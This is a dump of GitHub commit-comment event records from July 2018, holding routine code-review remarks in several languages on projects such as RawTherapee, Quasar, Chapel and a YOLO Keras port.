{"id":"7919893418","type":"CommitCommentEvent","actor":{"login":"kaddoura1"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29599088,"position":105,"line":172,"path":"app/src/main/java/com/example/android/miwok/ColorsActivity.java","commit_id":"2b548eae0e57d7ad0cbb9c77656fd24215ec6cb4","created_at":"2018-07-04T19:41:57Z","updated_at":"2018-07-04T19:41:57Z","author_association":"NONE","body":"The following line is not accepted any more, Checkk the pic attached.\r\nmAudioManager.abandonAudioFocus(mOnAudioFocusChangeListener); \r\n![untitled2](https://user-images.githubusercontent.com/40165146/42292432-9b5de254-7fe3-11e8-8b46-57fe297f17ee.png)\r\n\r\n\r\n"}},"created_at":"2018-07-04T19:41:57Z"}
{"id":"7919894784","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29599093,"position":null,"line":null,"path":null,"commit_id":"a78aa4f6a2c6d0db554a6ae00996a1d955ba81e9","created_at":"2018-07-04T19:42:30Z","updated_at":"2018-07-04T19:42:30Z","author_association":"OWNER","body":"The default value box is used when a parameter has a `default` key in the definition. The ones listed for `bib2gls` refer to the tool defaults... :wink: "}},"created_at":"2018-07-04T19:42:30Z"}
{"id":"7919900526","type":"CommitCommentEvent","actor":{"login":"digitalsanity"},"repo":{"name":"ayufan-rock64/libmali"},"payload":{"comment":{"id":29599100,"position":46,"line":70,"path":"debian/control","commit_id":"61376b99aa617cbdcff956901205a3ad6a3a31cb","created_at":"2018-07-04T19:44:34Z","updated_at":"2018-07-04T19:44:34Z","author_association":"NONE","body":"This should also have, at least:\r\n\r\nProvides: libopencl-1.1-1\r\n\r\nBut possibly more depending on what's actually supported in the library.  Still looking for that..\r\n\r\nProvides: libopencl-1.1-1, libopencl-1.2-1, libopencl-2.0-1, libopencl-2.1-1, libopencl1"}},"created_at":"2018-07-04T19:44:34Z"}
{"id":"7919902596","type":"CommitCommentEvent","actor":{"login":"kingskrump"},"repo":{"name":"kingskrump/marylandaep-app"},"payload":{"comment":{"id":29599107,"position":null,"line":null,"path":null,"commit_id":"366c69484b673d64c69e2044c9a7d41ea959572a","created_at":"2018-07-04T19:45:20Z","updated_at":"2018-07-04T19:45:20Z","author_association":"OWNER","body":"pushed!"}},"created_at":"2018-07-04T19:45:20Z"}
{"id":"7919903990","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599109,"position":5,"line":5,"path":"html/main.js","commit_id":"846cb824196207f8d4a590a44d2eb8f90e251603","created_at":"2018-07-04T19:45:53Z","updated_at":"2018-07-04T19:45:53Z","author_association":"NONE","body":"Сравнивать лучше с помощью `===`"}},"created_at":"2018-07-04T19:45:53Z"}
{"id":"7919905177","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599112,"position":16,"line":16,"path":"html/main.js","commit_id":"846cb824196207f8d4a590a44d2eb8f90e251603","created_at":"2018-07-04T19:46:21Z","updated_at":"2018-07-04T19:46:21Z","author_association":"NONE","body":"А скобочки здесь лишние"}},"created_at":"2018-07-04T19:46:21Z"}
{"id":"7919905691","type":"CommitCommentEvent","actor":{"login":"Geissr"},"repo":{"name":"lsa-pucrs/donnie-assistive-robot-sw"},"payload":{"comment":{"id":29599115,"position":42,"line":96,"path":"client/vib_belt/vib_belt.cc","commit_id":"6ee2540fdd8aca50eb56ce1ee33b05127c164398","created_at":"2018-07-04T19:46:33Z","updated_at":"2018-07-04T19:46:33Z","author_association":"COLLABORATOR","body":"Sim, eu até ia perguntar se vocês tinham modificado, pq na versão que eu passei era pra ser i+22"}},"created_at":"2018-07-04T19:46:33Z"}
{"id":"7919906731","type":"CommitCommentEvent","actor":{"login":"squamuglia"},"repo":{"name":"squamuglia/javascript-fetch-lab-nyc-web-051418"},"payload":{"comment":{"id":29599116,"position":null,"line":null,"path":null,"commit_id":"d2ea81df985aee661543854e83922099b14f4de0","created_at":"2018-07-04T19:46:59Z","updated_at":"2018-07-04T19:46:59Z","author_association":"OWNER","body":"Great stuff"}},"created_at":"2018-07-04T19:46:59Z"}
{"id":"7919907540","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599118,"position":38,"line":38,"path":"html/main.js","commit_id":"846cb824196207f8d4a590a44d2eb8f90e251603","created_at":"2018-07-04T19:47:20Z","updated_at":"2018-07-04T19:47:20Z","author_association":"NONE","body":"!=="}},"created_at":"2018-07-04T19:47:20Z"}
{"id":"7919908544","type":"CommitCommentEvent","actor":{"login":"amamory"},"repo":{"name":"lsa-pucrs/donnie-assistive-robot-sw"},"payload":{"comment":{"id":29599121,"position":null,"line":null,"path":null,"commit_id":"54fd6639eb0959ac29221ede974d04639dbd49bd","created_at":"2018-07-04T19:47:47Z","updated_at":"2018-07-04T19:47:47Z","author_association":"CONTRIBUTOR","body":"@Geissr favor comentar mais o código."}},"created_at":"2018-07-04T19:47:47Z"}
{"id":"7919911962","type":"CommitCommentEvent","actor":{"login":"Vladyslav317"},"repo":{"name":"Vladyslav317/test"},"payload":{"comment":{"id":29599123,"position":null,"line":null,"path":null,"commit_id":"25f3fb08e45e8f70f826c95d53bfe12c98f754a6","created_at":"2018-07-04T19:49:14Z","updated_at":"2018-07-04T19:49:14Z","author_association":"OWNER","body":"Hi"}},"created_at":"2018-07-04T19:49:14Z"}
{"id":"7919913331","type":"CommitCommentEvent","actor":{"login":"Thanatomanic"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29599124,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-04T19:49:46Z","updated_at":"2018-07-04T19:49:46Z","author_association":"CONTRIBUTOR","body":"I guess you're right, and I just have to deal with the consequences of filing an issue. :wink:\r\n\r\nBut I really wonder if anyone used the old behavior as an honest feature. The consequence for me is that I will have to go through my collection and apply a partial profile to every image to set this to false, in the off chance that I had previously forgot to disable resize in images that I cropped more than my usual export size of 3000px wide... \r\n(This is just a hassle, because if I'm not mistaken, you cannot see the images from multiple folders at once)"}},"created_at":"2018-07-04T19:49:46Z"}
{"id":"7919913679","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599125,"position":59,"line":59,"path":"html/main.js","commit_id":"846cb824196207f8d4a590a44d2eb8f90e251603","created_at":"2018-07-04T19:49:56Z","updated_at":"2018-07-04T19:49:56Z","author_association":"NONE","body":"И тут скобочки не нужны"}},"created_at":"2018-07-04T19:49:56Z"}
{"id":"7919920408","type":"CommitCommentEvent","actor":{"login":"Geissr"},"repo":{"name":"lsa-pucrs/donnie-assistive-robot-sw"},"payload":{"comment":{"id":29599132,"position":55,"line":108,"path":"client/vib_belt/vib_belt.cc","commit_id":"6ee2540fdd8aca50eb56ce1ee33b05127c164398","created_at":"2018-07-04T19:52:48Z","updated_at":"2018-07-04T19:52:48Z","author_association":"COLLABORATOR","body":"Pode ter até o nível F, mas pelos meus teste não eram perceptíveis... Já em relação ao nível C não estar presente no código provavelmente esqueci de colocar o outro if depois de fazer um teste só com A,B e P"}},"created_at":"2018-07-04T19:52:48Z"}
{"id":"7919920521","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599133,"position":null,"line":null,"path":null,"commit_id":"3f3f7d61d4ff5b149e32104b5e334be76b40e690","created_at":"2018-07-04T19:52:51Z","updated_at":"2018-07-04T19:52:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/95ed9bd9-62a1-4519-83ff-716671136007?env_id=ibm%3Ayp%3Aus-south \"geolud\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-195250 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-195250\") to [staging](https://console.bluemix.net/apps/8ea4e46e-9db8-4c70-8f71-37c4a617032d?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T19:52:51Z"}
{"id":"7919920855","type":"CommitCommentEvent","actor":{"login":"03081991"},"repo":{"name":"03081991/HILARIO"},"payload":{"comment":{"id":29599134,"position":1,"line":1,"path":"AQUINO","commit_id":"4ee2f29f1615065f85d3925b8afdd57a66b8d397","created_at":"2018-07-04T19:52:59Z","updated_at":"2018-07-04T19:52:59Z","author_association":"OWNER","body":"story-joe-edit.txt"}},"created_at":"2018-07-04T19:52:59Z"}
{"id":"7919921752","type":"CommitCommentEvent","actor":{"login":"03081991"},"repo":{"name":"03081991/HILARIO"},"payload":{"comment":{"id":29599135,"position":1,"line":1,"path":"AQUINO","commit_id":"4ee2f29f1615065f85d3925b8afdd57a66b8d397","created_at":"2018-07-04T19:53:22Z","updated_at":"2018-07-04T19:53:22Z","author_association":"OWNER","body":"story.txt"}},"created_at":"2018-07-04T19:53:22Z"}
{"id":"7919923708","type":"CommitCommentEvent","actor":{"login":"03081991"},"repo":{"name":"03081991/HILARIO"},"payload":{"comment":{"id":29599138,"position":1,"line":1,"path":"AQUINO","commit_id":"4ee2f29f1615065f85d3925b8afdd57a66b8d397","created_at":"2018-07-04T19:54:11Z","updated_at":"2018-07-04T19:54:11Z","author_association":"OWNER","body":"story-joe-edit-reviewed.txt"}},"created_at":"2018-07-04T19:54:11Z"}
{"id":"7919925092","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29599139,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-04T19:54:47Z","updated_at":"2018-07-04T19:54:47Z","author_association":"COLLABORATOR","body":"@Thanatomanic I agree with your arguments."}},"created_at":"2018-07-04T19:54:47Z"}
{"id":"7919925869","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599140,"position":73,"line":73,"path":"html/main.js","commit_id":"846cb824196207f8d4a590a44d2eb8f90e251603","created_at":"2018-07-04T19:55:07Z","updated_at":"2018-07-04T19:55:07Z","author_association":"NONE","body":"Я бы или листенеры делал на JS, или на  jquery)"}},"created_at":"2018-07-04T19:55:07Z"}
{"id":"7919926986","type":"CommitCommentEvent","actor":{"login":"rstoenescu"},"repo":{"name":"quasarframework/quasar"},"payload":{"comment":{"id":29599144,"position":4,"line":31,"path":"build/webpack.ssr.client.js","commit_id":"1e54165ec0ae94e55b90eb85a4590aad9a93d16e","created_at":"2018-07-04T19:55:33Z","updated_at":"2018-07-04T19:55:33Z","author_association":"MEMBER","body":"Hi,\r\n\r\n1. This only matters for the /dev app in Quasar repo, used for developing Quasar itself. It has no impact over the defines injected by Quasar CLI into an app.\r\n2. Just like process.env.DEV or process.env.PROD from Quasar CLI injects, this is more appropriate as it follows the same line.\r\n3. It's shorter to write `if (process.env.CLIENT)` than `if (process.env.VUE_ENV === 'client')`.. imagine using it inside component code. Too much \"bloat\" on the latter option."}},"created_at":"2018-07-04T19:55:33Z"}
{"id":"7919930279","type":"CommitCommentEvent","actor":{"login":"Demian87"},"repo":{"name":"Demian87/scrumonline"},"payload":{"comment":{"id":29599146,"position":null,"line":null,"path":null,"commit_id":"b7281411f540d32536445c16f4d934bcd55cdfae","created_at":"2018-07-04T19:56:52Z","updated_at":"2018-07-04T19:56:52Z","author_association":"OWNER","body":"I use it for jira issue url. You should extend this commit to get an ability to set it up in default issue of your service."}},"created_at":"2018-07-04T19:56:52Z"}
{"id":"7919931195","type":"CommitCommentEvent","actor":{"login":"stefanseefeld"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599149,"position":1,"line":1,"path":"benchmarks/opencl/ublas_prod.cpp","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T19:57:15Z","updated_at":"2018-07-04T19:57:15Z","author_association":"COLLABORATOR","body":"As far as I can see, this is a benchmark for the \"built-in\" `prod()` operation which doesn't use OpenCL at all. So this should actually be moved in the the parent directory (`benchmarks/`), and all the OpenCL references from the source removed."}},"created_at":"2018-07-04T19:57:15Z"}
{"id":"7919932459","type":"CommitCommentEvent","actor":{"login":"stefanseefeld"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599151,"position":5,"line":5,"path":"benchmarks/opencl/ublas_prod.cpp","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T19:57:44Z","updated_at":"2018-07-04T19:57:44Z","author_association":"COLLABORATOR","body":"Why is this `<new>` header being included ?"}},"created_at":"2018-07-04T19:57:44Z"}
{"id":"7919933123","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599153,"position":null,"line":null,"path":null,"commit_id":"b262f82eb6f47cd4b5e57df5fa27de73a65dbae6","created_at":"2018-07-04T19:58:01Z","updated_at":"2018-07-04T19:58:01Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/95ed9bd9-62a1-4519-83ff-716671136007?env_id=ibm%3Ayp%3Aus-south \"geolud\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-195800 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-195800\") to [staging](https://console.bluemix.net/apps/8ea4e46e-9db8-4c70-8f71-37c4a617032d?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T19:58:01Z"}
{"id":"7919935648","type":"CommitCommentEvent","actor":{"login":"bradcray"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29599159,"position":8,"line":791,"path":"util/start_test","commit_id":"71b07766eba924122717eb2f6335e7a33cf8fa40","created_at":"2018-07-04T19:59:05Z","updated_at":"2018-07-04T19:59:05Z","author_association":"MEMBER","body":"@psahabu, @ronawho, @benharsh:  My Python's admittedly not great, but doesn't this conditional have the effect of generating an error on every sub_test run if CHPL_REGEXP is set to 'none'?  And then doesn't the second part of it check whether or not CHPL_RE2_VALGRIND_SUPPORT is on in the user's current environment, not whether it was on whenever it was that they built re2?  (which, from the error message, seems to be what matters?)"}},"created_at":"2018-07-04T19:59:05Z"}
{"id":"7919935835","type":"CommitCommentEvent","actor":{"login":"stefanseefeld"},"repo":{"name":"BoostGSoC18/ublas-gpu"},"payload":{"comment":{"id":29599160,"position":8,"line":8,"path":"benchmarks/opencl/Jamfile.v2","commit_id":"aea878b1455ef515de275eb13a09c742a56b6ca2","created_at":"2018-07-04T19:59:09Z","updated_at":"2018-07-04T19:59:09Z","author_association":"COLLABORATOR","body":"As mentioned elsewhere, th `ublas_prod` benchmark isn't using opencl, so it should neither depend on the presence of the `clblas` and `opencl` libraries, nor should it be in this set of benchmarks at all."}},"created_at":"2018-07-04T19:59:09Z"}
{"id":"7919936606","type":"CommitCommentEvent","actor":{"login":"Julian"},"repo":{"name":"julianghionoiu/tdl-runner-csharp"},"payload":{"comment":{"id":29599161,"position":null,"line":null,"path":null,"commit_id":"99b2bbf701cf775bf8b3117d481bd00ac84dcbdc","created_at":"2018-07-04T19:59:27Z","updated_at":"2018-07-04T19:59:27Z","author_association":"NONE","body":"Hi, please be a bit more careful with your @ mentions, this is the second one I've gotten from this repo :), thanks."}},"created_at":"2018-07-04T19:59:27Z"}
{"id":"7919936721","type":"CommitCommentEvent","actor":{"login":"Beep6581"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29599162,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-04T19:59:30Z","updated_at":"2018-07-04T19:59:30Z","author_association":"OWNER","body":"@Thanatomanic \r\n```bash\r\nsed -i '/\\[Resize\\]/a AllowUpscaling=False' /tmp/amsterdam.pef.pp3\r\n```\r\n:]"}},"created_at":"2018-07-04T19:59:30Z"}
{"id":"7919937488","type":"CommitCommentEvent","actor":{"login":"nprail"},"repo":{"name":"superfly/wormhole"},"payload":{"comment":{"id":29599163,"position":null,"line":null,"path":null,"commit_id":"70785b0b78066fc003154a9aa9e19c015e0a6c6c","created_at":"2018-07-04T19:59:51Z","updated_at":"2018-07-04T19:59:51Z","author_association":"NONE","body":"@jeromegn Great idea. "}},"created_at":"2018-07-04T19:59:51Z"}
{"id":"7915827394","type":"CommitCommentEvent","actor":{"login":"YYAIYOULING"},"repo":{"name":"YYAIYOULING/testGitRepository"},"payload":{"comment":{"id":29589083,"position":2,"line":9,"path":"apiSearch/src/apiRquest/CglibBean.java","commit_id":"01d982bbd30c4659fe5778a650a85a36d3e9b92e","created_at":"2018-07-04T02:00:01Z","updated_at":"2018-07-04T02:00:01Z","author_association":"OWNER","body":"合并"}},"created_at":"2018-07-04T02:00:01Z"}
{"id":"7915834282","type":"CommitCommentEvent","actor":{"login":"philtrade"},"repo":{"name":"qqwweee/keras-yolo3"},"payload":{"comment":{"id":29589099,"position":5,"line":20,"path":"yolo.py","commit_id":"da7d756b0e47b979e701f0131ba7074ea138add8","created_at":"2018-07-04T02:02:44Z","updated_at":"2018-07-04T02:02:44Z","author_association":"NONE","body":"Is it a good idea to force users to modify the code base (yolo.py), in order to specify a list of CUDA devices?  Typical usage pattern for CUDA_VISIBLE_DEVICES is to specify that in the shell, e.g.\r\n\r\nexport CUDA_VISIBLE_DEVICES=\"0,1\"  runThisApp\r\n\r\nAlso, CUDA is nVidia-specific, introducing such device-specific code in the yolo.py class definition seems a bit odd.\r\n"}},"created_at":"2018-07-04T02:02:44Z"}
{"id":"7915834417","type":"CommitCommentEvent","actor":{"login":"philtrade"},"repo":{"name":"qqwweee/keras-yolo3"},"payload":{"comment":{"id":29589100,"position":15,"line":85,"path":"yolo.py","commit_id":"da7d756b0e47b979e701f0131ba7074ea138add8","created_at":"2018-07-04T02:02:47Z","updated_at":"2018-07-04T02:02:47Z","author_association":"NONE","body":"Again, hard-coding gpu_num *inside* yolo.py isn't the best practice.\r\n\r\nIMHO, the less intrustive and flexible way is to allow gpu_num specification on command line, or default it at the higher level caller, and pass that down during the instantiation of the yolo class object, and don't mess with CUDA_VISIBLE_DEVICES in yolo.py, to avoid becoming a source of confusion in the future."}},"created_at":"2018-07-04T02:02:47Z"}
{"id":"7915839439","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29589110,"position":null,"line":null,"path":null,"commit_id":"7e30678ebe480c86aed796eef33ffd2cc13bc61e","created_at":"2018-07-04T02:04:56Z","updated_at":"2018-07-04T02:04:56Z","author_association":"COLLABORATOR","body":"1) throws Exception why???? Un test no debería levantar excepciones externamente en primer instancia... A parte no veo motivo para levantarlo. \r\n2) userNameIsUniqueTest podrían volver a usar la variable que declararon arriba y en otro caso otro usuario nuevo con el mismo nombre, pero solo el nombre. \r\n2,1) no avisa nada el sistema cuando es reptido al agregar? no devuelve nada? no lanza una excepción propia, nada???? mmmmm ese funcionamiento es anti natural y te obliga a \"re preguntar\" para saber qué pasó (cuando directamente podría avisarlo el mismo método al volver).\r\n3) Fijense que como dije en el otro caso, instancian entre ejecuciones de tests objetos innecesariamente ejemplo las location. \r\n4) commentContinueExistTest  no \"testea profundamente el caso\". Me explico acá solo se fija la cantidad... y si hay un bug externo que siempre lo pone en uno? podríamos testear varias cantidades distintas? podrían verificar que los valores que realmente se almacenan/cambian son los esperados? etc.\r\nEsto aplica a varias cosas, es más un comentario general para que tengan cuidado y no se fíen. "}},"created_at":"2018-07-04T02:04:56Z"}
{"id":"7915839829","type":"CommitCommentEvent","actor":{"login":"pmbohm"},"repo":{"name":"aodn/geoserver-build"},"payload":{"comment":{"id":29589111,"position":92,"line":139,"path":"src/extension/wps/src/main/java/au/org/emii/wps/GoGoDuckProcess.java","commit_id":"d69752c7d9b067402793018c7905a7b86f72eeb4","created_at":"2018-07-04T02:05:07Z","updated_at":"2018-07-04T02:05:07Z","author_association":"MEMBER","body":"@jonescc This will always fail as `provenance_template_gridded.ftl` expects params.timeRange ?"}},"created_at":"2018-07-04T02:05:07Z"}
{"id":"7915841245","type":"CommitCommentEvent","actor":{"login":"UniqueNull"},"repo":{"name":"UniqueNull/wx"},"payload":{"comment":{"id":29589112,"position":4,"line":10,"path":"src/main/java/com/alias/wx/service/authentication/MyX509TrustManager.java","commit_id":"504d3ead18c6c5864a1e69a15bb9729f9abad268","created_at":"2018-07-04T02:05:40Z","updated_at":"2018-07-04T02:05:40Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-04T02:05:40Z"}
{"id":"7915843008","type":"CommitCommentEvent","actor":{"login":"UniqueNull"},"repo":{"name":"UniqueNull/wx"},"payload":{"comment":{"id":29589116,"position":4,"line":10,"path":"src/main/java/com/alias/wx/service/authentication/MyX509TrustManager.java","commit_id":"504d3ead18c6c5864a1e69a15bb9729f9abad268","created_at":"2018-07-04T02:06:23Z","updated_at":"2018-07-04T02:06:23Z","author_association":"OWNER","body":"no"}},"created_at":"2018-07-04T02:06:23Z"}
{"id":"7915843557","type":"CommitCommentEvent","actor":{"login":"UniqueNull"},"repo":{"name":"UniqueNull/wx"},"payload":{"comment":{"id":29589117,"position":3,"line":9,"path":"src/main/java/com/alias/wx/service/authentication/MyX509TrustManager.java","commit_id":"504d3ead18c6c5864a1e69a15bb9729f9abad268","created_at":"2018-07-04T02:06:38Z","updated_at":"2018-07-04T02:06:38Z","author_association":"OWNER","body":"no"}},"created_at":"2018-07-04T02:06:38Z"}
{"id":"7915849709","type":"CommitCommentEvent","actor":{"login":"abcfy2"},"repo":{"name":"hillwoodroc/winetricks-zh"},"payload":{"comment":{"id":29589131,"position":null,"line":null,"path":null,"commit_id":"6dd1d123beeddd0b29b57137adae50edb4e8073e","created_at":"2018-07-04T02:09:13Z","updated_at":"2018-07-04T02:09:13Z","author_association":"CONTRIBUTOR","body":"能否降级到2.1.5版本？2.2.5版本在wine下会出现链接卡死的现象"}},"created_at":"2018-07-04T02:09:13Z"}
{"id":"7915858253","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29589149,"position":null,"line":null,"path":null,"commit_id":"6732af10e9174c868938d10e944a8bd4cb2a50ca","created_at":"2018-07-04T02:12:41Z","updated_at":"2018-07-04T02:12:41Z","author_association":"CONTRIBUTOR","body":"Good point."}},"created_at":"2018-07-04T02:12:41Z"}
{"id":"7915865047","type":"CommitCommentEvent","actor":{"login":"chillatgvc"},"repo":{"name":"wocommunity/wonder"},"payload":{"comment":{"id":29589155,"position":null,"line":null,"path":null,"commit_id":"5af47fae17526fa5e53d56d5c7c281ba1761e85b","created_at":"2018-07-04T02:15:19Z","updated_at":"2018-07-04T02:15:19Z","author_association":"MEMBER","body":"Agreed, the whole clone() thing was poorly thought out and implemented in Java.  It is super easy to get wrong and hard to get right for any non-trivial, intended to be sub-classed class.\r\n\r\nFrom: Paul Hoadley <notifications@github.com>\r\nReply-To: wocommunity/wonder <reply@reply.github.com>\r\nDate: Tuesday, July 3, 2018 at 5:16 PM\r\nTo: wocommunity/wonder <wonder@noreply.github.com>\r\nCc: Chuck Hill <chill@gevityinc.com>, Comment <comment@noreply.github.com>\r\nSubject: Re: [wocommunity/wonder] Add collectors for NSCollection types (5af47fa)\r\n\r\n\r\nIt makes no sense to “clone” an immutable object by creating a new instance. Clone is only meaningful with a mutable object.\r\n\r\nWhether or not that's true (and Joshua Bloch certainly agrees that it's at least \"wasteful\"—\"Effective Java\", 3rd ed, Item 13), it's not prohibited in any sense, in which case...\r\n\r\nI guess you could call it an optimization.\r\n\r\nI think you could probably argue it's broken. Although Cloneable/clone() is an ugly area of Java (Bloch calls it \"fragile, dangerous and extralinguistic\"), the Javadocs for Object.clone()<https://docs.oracle.com/javase/8/docs/api/java/lang/Object.html#clone--> do provide a \"general intent\" that, among other things:\r\n\r\nx.clone() != x\r\n\r\nAn implementation of clone() that returns this would break that \"general intent\", though the docs also allow that \"The precise meaning of \"copy\" may depend on the class of the object\". Personally, I'd just steer well clear of the clone() method here.\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/wocommunity/wonder/commit/5af47fae17526fa5e53d56d5c7c281ba1761e85b#commitcomment-29588505>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAAMb6IruzbqNqtv-ivueOl--0yX4F2Wks5uDAlWgaJpZM4VBiJP>.\r\n"}},"created_at":"2018-07-04T02:15:19Z"}
{"id":"7915868038","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29589159,"position":null,"line":null,"path":null,"commit_id":"f9d9a9baf6eebf5d9d136c84e26a3f4009d9e29e","created_at":"2018-07-04T02:16:33Z","updated_at":"2018-07-04T02:16:33Z","author_association":"COLLABORATOR","body":"1) @BeforeEach no lo usan? borren todo entonces, no se qué hace anotación y método ahí...\r\n2) Nombre poco claro de la clase del test y el método. TestUser test... muy explícito no es. \r\n3) Cuidado! if(user.getUser().equals(responsible.getUser())) ese equals se fija si son la misma instancia en memoria...  \r\n![image](https://user-images.githubusercontent.com/5290384/42253123-8e3b56ba-7f16-11e8-9a68-b8087e9c6429.png)\r\n\r\n4) ¿lo que querían testear es: si el usuario responsable de un restaurante es el mismo que el usuario \"común\" del sistema? \r\nSí la pregunta es una pregunta y a su vez muestra las consecuencias del nombre poco claro y el test taan largo  y sin documentar. \r\n5) recuerden que pueden comentar con java doc o usando comentarios en múltiples líneas (a veces comentan) \r\n\r\n"}},"created_at":"2018-07-04T02:16:33Z"}
{"id":"7915871474","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29589165,"position":null,"line":null,"path":null,"commit_id":"6732af10e9174c868938d10e944a8bd4cb2a50ca","created_at":"2018-07-04T02:17:59Z","updated_at":"2018-07-04T02:17:59Z","author_association":"CONTRIBUTOR","body":"https://github.com/uBlockOrigin/uAssets/commit/233a26ff2a8feef4eec2aabf0a95dab0a0975487"}},"created_at":"2018-07-04T02:17:59Z"}
{"id":"7915875843","type":"CommitCommentEvent","actor":{"login":"ruchgarcia"},"repo":{"name":"ruchgarcia/Test123"},"payload":{"comment":{"id":29589168,"position":null,"line":null,"path":null,"commit_id":"ec82aca591d4386137875fe574f8f736b7066af2","created_at":"2018-07-04T02:19:42Z","updated_at":"2018-07-04T02:19:42Z","author_association":"OWNER","body":"bdnsdn"}},"created_at":"2018-07-04T02:19:42Z"}
{"id":"7915879410","type":"CommitCommentEvent","actor":{"login":"rama64"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29589171,"position":null,"line":null,"path":null,"commit_id":"8a46870008d3afeacc5637ad71b150c73b371e42","created_at":"2018-07-04T02:21:11Z","updated_at":"2018-07-04T02:21:11Z","author_association":"COLLABORATOR","body":"1) Excelente usando mockito!\r\n2) Mal el nombre del test (archivo) \r\n3) Los nombres de los métodos de testing podrían ser más explícitos y estar documentados. Tipos de test? sentido? etc... \r\n4) me quedo con que usaron mockito :D  "}},"created_at":"2018-07-04T02:21:11Z"}
{"id":"7915879478","type":"CommitCommentEvent","actor":{"login":"AntonioLimaSilva"},"repo":{"name":"AntonioLimaSilva/System-UI"},"payload":{"comment":{"id":29589172,"position":null,"line":null,"path":null,"commit_id":"0f401b3d20dda6b41b51942261e4dd72871a622d","created_at":"2018-07-04T02:21:13Z","updated_at":"2018-07-04T02:21:13Z","author_association":"OWNER","body":"Configuration Datepicker"}},"created_at":"2018-07-04T02:21:13Z"}
{"id":"7915880712","type":"CommitCommentEvent","actor":{"login":"rhand25"},"repo":{"name":"aosp-tissot/frameworks_base"},"payload":{"comment":{"id":29589177,"position":null,"line":null,"path":null,"commit_id":"6182caa55d808c642d6e69aa516c808748f9bc9a","created_at":"2018-07-04T02:21:48Z","updated_at":"2018-07-04T02:21:48Z","author_association":"NONE","body":"Wheres the  download link"}},"created_at":"2018-07-04T02:21:48Z"}
{"id":"7915881073","type":"CommitCommentEvent","actor":{"login":"GuYan-No1"},"repo":{"name":"GuYan-No1/wangchuang.github.io"},"payload":{"comment":{"id":29589180,"position":23,"line":23,"path":".gitignore","commit_id":"6a0749d03c57e792ee4723c2151abad4a9f5d7f4","created_at":"2018-07-04T02:21:57Z","updated_at":"2018-07-04T02:21:57Z","author_association":"OWNER","body":"  # dependencies\r\n    /node_modules\r\n\r\n    # testing\r\n    /coverage\r\n\r\n    # production\r\n    /build\r\n\r\n    # misc\r\n    .DS_Store\r\n    .env.local\r\n    .env.development.local\r\n    .env.test.local\r\n    .env.production.local\r\n\r\n    npm-debug.log*\r\n    yarn-debug.log*\r\n    yarn-error.log*\r\n\r\n    .idea"}},"created_at":"2018-07-04T02:21:57Z"}
